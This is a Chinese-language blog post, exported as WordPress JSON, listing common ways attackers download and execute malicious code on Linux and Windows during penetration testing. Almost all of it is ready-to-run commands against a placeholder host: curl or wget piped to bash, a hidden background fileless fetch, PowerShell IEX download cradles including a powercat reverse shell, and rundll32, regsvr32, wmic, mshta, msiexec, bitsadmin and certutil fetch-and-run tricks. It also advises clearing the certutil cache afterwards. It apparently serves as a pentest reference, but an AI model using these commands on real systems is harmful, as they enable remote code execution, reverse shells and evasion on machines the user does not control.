{"id":1944,"date":"2024-01-10T15:20:00","date_gmt":"2024-01-10T07:20:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1944"},"modified":"2025-01-10T16:18:23","modified_gmt":"2025-01-10T08:18:23","slug":"download-malicious-code","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1944","title":{"rendered":"Download Malicious Code"},"content":{"rendered":"\n

<\/p>\n\n\n\n

\u5728\u6ef2\u900f\u904e\u7a0b\u4e2d\uff0c\u653b\u64ca\u8005\u5f80\u5f80\u9700\u8981\u900f\u904e\u6307\u4ee4\u4e0b\u8f09\u57f7\u884c\u60e1\u610f\u7a0b\u5f0f\u78bc\uff0c\u5be6\u73fe\u8cc7\u8a0a\u6536\u96c6\u3001\u6301\u4e45\u5316\u3001\u6b0a\u9650\u63d0\u5347\u3001\u9632\u79a6\u7e5e\u904e\u3001\u63d0\u53d6\u6191\u8b49\u3001\u6a6b\u5411\u79fb\u52d5\u3001\u8cc7\u6599\u6ef2\u51fa\u7b49\u64cd\u4f5c\u3002\u4ee5\u4e0b\u7e3d\u7d50Linux\u548cWindows\u4e2d\u4e0b\u8f09\u548c\u57f7\u884c\u60e1\u610f\u7a0b\u5f0f\u78bc\u7684\u5e38\u898b\u65b9\u6cd5\u3002<\/p>\n\n\n\n

<\/p>\n\n\n\n

\n\n\n\n

<\/p>\n\n\n\n

Linux <\/h2>\n\n\n\n

1.curl<\/h4>\n\n\n\n

\u4ee5curl\u7684\u65b9\u5f0f\u57f7\u884chttp\u9801\u9762\u4e0a\u7684shell\u8173\u672c\uff0c\u7121\u9700download\uff0c\u5728\u672c\u6a5f\u4e0a\u76f4\u63a5\u57f7\u884c\u3002<\/p>\n\n\n\n

\u65b9\u5f0f1\uff1acurl http:\/\/10.10.10.10\/test.sh | bash<\/code><\/p>\n\n\n\n

\u65b9\u5f0f2\uff1abash < <( curl http:\/\/10.10.10.10\/test.sh)<\/code><\/p>\n\n\n\n

\n\n\n\n

2.wget<\/h4>\n\n\n\n

\u57f7\u884cwget\u547d\u4ee4\u9060\u7aef\u4e0b\u8f09\u60e1\u610f\u7a0b\u5f0f\u3002<\/p>\n\n\n\n

\u65b9\u5f0f1\uff1awget -q -O- http:\/\/10.10.10.10\/test.sh | bash<\/code><\/p>\n\n\n\n

\u65b9\u5f0f2\uff1awget http:\/\/10.10.10.10\/shell.txt -O \/tmp\/x.php && php \/tmp\/x.php<\/code><\/p>\n\n\n\n

\u65b9\u5f0f3\uff1acurl+wget\u5408\u4f75\uff0c\u5be6\u73fe\u7121\u6a94\u6848\u9060\u7aef\u60e1\u610f\u7a0b\u5f0f\u78bc\u57f7\u884c\u3002<\/p>\n\n\n\n

bash -c '(curl -fsSL http:\/\/10.10.10.10\/test.sh||wget -q -O- http:\/\/10.10.10.10\/test.sh)|bash -sh >\/dev\/null 2>&1&'<\/code><\/p>\n\n\n\n

\n\n\n\n

3.rcp<\/h4>\n\n\n\n

rcp\u6307\u4ee4\u7528\u65bc\u8907\u88fd\u9060\u7aef\u6a94\u6848\u6216\u76ee\u9304\u3002<\/p>\n\n\n\n

rcp root@x.x.x.x:.\/testfile testfile<\/code><\/p>\n\n\n\n

\n\n\n\n

4.scp<\/h4>\n\n\n\n

scp \u662frcp \u7684\u52a0\u5f37\u7248\uff0cscp\u662f\u52a0\u5bc6\u7684\uff0crcp\u662f\u4e0d\u52a0\u5bc6\u7684\u3002<\/p>\n\n\n\n

scp username@servername:\/path\/filename \/tmp\/local_destination<\/code><\/p>\n\n\n\n

\n\n\n\n

5.rsync<\/h4>\n\n\n\n

\u4f7f\u7528rsync\u53ef\u4ee5\u9032\u884c\u9060\u7aef\u540c\u6b65\uff0c\u62c9\u53d6\u6a94\u6848\u5230\u672c\u6a5f\u4f3a\u670d\u5668\u3002<\/p>\n\n\n\n

rsync -av 10.10.10.10 :\/tmp\/passwd.txt \/tmp\/passwd.txt<\/code><\/p>\n\n\n\n

\n\n\n\n

6.sftp<\/h4>\n\n\n\n

\u4f7f\u7528sftp\u4e0b\u8f09\u9060\u7aef\u4f3a\u670d\u5668\u4e0a\u7684\u6a94\u6848\u3002<\/p>\n\n\n\n

sftp admin@10.10.10.10 <<EOF  \nget  \/tmp\/2.txt            \nquit \nEOF<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n
Windows<\/h2>\n\n\n\n
1.Powershell<\/h4>\n\n\n\n
\u5229\u7528powershell\u9060\u7aef\u57f7\u884cps1\u8173\u672c\u3002<\/p>\n\n\n\n
powershell IEX (New-Object System.Net.Webclient).DownloadString('http:\/\/10.10.10.10\/powercat.ps1');powercat -c 10.10.10.10 -p 6666 -e cmd<\/code><\/p>\n\n\n\n
powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http:\/\/10.10.10.10\/evil.txt'))\"<\/code><\/p>\n\n\n\n
\n\n\n\n
2.rundll32<\/h4>\n\n\n\n
\u4f7f\u7528rundll32.exe\uff0c\u53ef\u4ee5\u900f\u904emshtml.dll\u57f7\u884cJavaScript \uff0c\u4f9d\u8cf4WScript.shell\u9019\u500b\u5143\u4ef6<\/p>\n\n\n\n
rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http:\/\/10.10.10.10\/connect\",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd \/c taskkill \/f \/im rundll32.exe\",0,true);}<\/code><\/pre>\n\n\n\n
\n\n\n\n
3.regsvr32<\/h4>\n\n\n\n
\u9060\u7aef\u8f09\u5165\u57f7\u884c\uff0c\u89e3\u6790.src\u6a94\u3002<\/p>\n\n\n\n
regsvr32.exe \/u \/n \/s \/i:http:\/\/10.10.10.10\/file.sct scrobj.dll<\/code><\/p>\n\n\n\n
\n\n\n\n
4.wmic<\/h4>\n\n\n\n
\u57f7\u884cWMIC\u4ee5\u4e0b\u547d\u4ee4\u5f9e\u9060\u7aef\u4f3a\u670d\u5668\u4e0b\u8f09\u4e26\u57f7\u884c\u60e1\u610fXSL\u6a94\u6848\uff1a<\/p>\n\n\n\n
wmic os get \/FORMAT:\"http:\/\/10.10.10.10\/evil.xsl\"<\/code><\/p>\n\n\n\n
\n\n\n\n
5.msiexec<\/h4>\n\n\n\n
\u7528\u65bc\u5b89\u88ddWindows Installer\u5b89\u88dd\u5305\uff0c\u53ef\u9060\u7aef\u57f7\u884cmsi\u6a94\u6848\u3002<\/p>\n\n\n\n
msiexec \/q \/i http:\/\/10.10.10.10\/evil.msi<\/code><\/p>\n\n\n\n
\n\n\n\n
6.IEExec<\/h4>\n\n\n\n
IEexec.exe\u61c9\u7528\u7a0b\u5f0f\u662f.NET Framework\u9644\u5e36\u7a0b\u5e8f\uff0c\u57f7\u884cIEExec.exe\u4e26\u4f7f\u7528url\u555f\u52d5\u5176\u4ed6\u7a0b\u5f0f\u3002<\/p>\n\n\n\n
crosoft.NET\\Framework64\\v2.0.50727>caspol.exe -s off C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727>IEExec.exe http:\/\/10.10.10.10\/evil.exe<\/code><\/p>\n\n\n\n
\n\n\n\n
7.mshta<\/h4>\n\n\n\n
mshta\u7528\u65bc\u57f7\u884c.hta\u6587\u4ef6<\/p>\n\n\n\n
mshta http:\/\/10.10.10.10\/run.hta<\/code><\/p>\n\n\n\n
\n\n\n\n
8.msxsl<\/h4>\n\n\n\n
msxsl.exe\u662f\u5fae\u8edf\u7528\u4f86\u547d\u4ee4\u5217\u4e0b\u8655\u7406XSL\u7684\u7a0b\u5f0f<\/p>\n\n\n\n
msxsl http:\/\/10.10.10.10\/scripts\/demo.xml http:\/\/10.10.10.10\/scripts\/exec.xsl<\/code><\/p>\n\n\n\n
\n\n\n\n
9.pubprn.vbs<\/h4>\n\n\n\n
\u5728Windows 7\u4ee5\u4e0a\u7248\u672c\u5b58\u5728\u4e00\u500b\u540d\u70bapubprn.vbs\u7684\u5fae\u8edf\u5df2\u7c3d\u7f72WSH\u8173\u672c\uff0c\u53ef\u4ee5\u5229\u7528\u4f86\u89e3\u6790.sct\u8173\u672c\uff1a<\/p>\n\n\n\n
cscript pubprn.vbs 127.0.0.1 script:https:\/\/10.10.10.10\/file.sct<\/code><\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n
10.Bitsadmin<\/h4>\n\n\n\n
\u5229\u7528bitsadmin\u6307\u4ee4\u4e0b\u8f09\u6a94\u6848\u5230\u76ee\u6a19\u6a5f\u3002<\/p>\n\n\n\n
bitsadmin \/transfer n http:\/\/10.10.10.10\/imag\/evil.bat d:\\test\\1.bat<\/code><\/p>\n\n\n\n
\n\n\n\n
11.certutil<\/h4>\n\n\n\n
\u7528\u65bc\u5099\u4efd\u6191\u8b49\u670d\u52d9\uff0c\u4e00\u822c\u5efa\u8b70\u4e0b\u8f09\u5b8c\u6a94\u6848\u5f8c\u5c0d\u5feb\u53d6\u9032\u884c\u522a\u9664\u3002<\/p>\n\n\n\n
\u4e0b\u8f7d\u6587\u4ef6 certutil -urlcache -split -f http:\/\/10.10.10.10\/imag\/evil.txt test.php<\/code><\/p>\n\n\n\n
\u5220\u9664\u7f13\u5b58 certutil -urlcache -split -f http:\/\/10.10.10.10\/imag\/evil.txt delete<\/code><\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n
<\/p>\n\n\n\n
refer:
https:\/\/www.cnblogs.com\/xiaozi\/p\/13534602.html<\/p>\n","protected":false},"excerpt":{"rendered":"
\u5728\u6ef2\u900f\u904e\u7a0b\u4e2d\uff0c\u653b\u64ca\u8005\u5f80\u5f80\u9700\u8981\u900f\u904e\u6307\u4ee4\u4e0b\u8f09\u57f7\u884c\u60e1\u610f\u7a0b\u5f0f\u78bc\uff0c\u5be6\u73fe\u8cc7\u8a0a\u6536\u96c6\u3001\u6301\u4e45\u5316\u3001\u6b0a\u9650\u63d0\u5347\u3001\u9632\u79a6\u7e5e\u904e\u3001\u63d0\u53d6\u6191\u8b49\u3001\u6a6b\u5411\u79fb\u52d5\u3001\u8cc7\u6599\u6ef2\u51fa\u7b49\u64cd\u4f5c\u3002\u4ee5\u4e0b\u7e3d\u7d50Linux\u548cWindows\u4e2d\u4e0b\u8f09\u548c\u57f7\u884c\u60e1\u610f\u7a0b\u5f0f\u78bc\u7684\u5e38\u898b\u65b9\u6cd5\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[368],"tags":[],"class_list":["post-1944","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1944","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1944"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1944\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1944"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1944"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1944"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}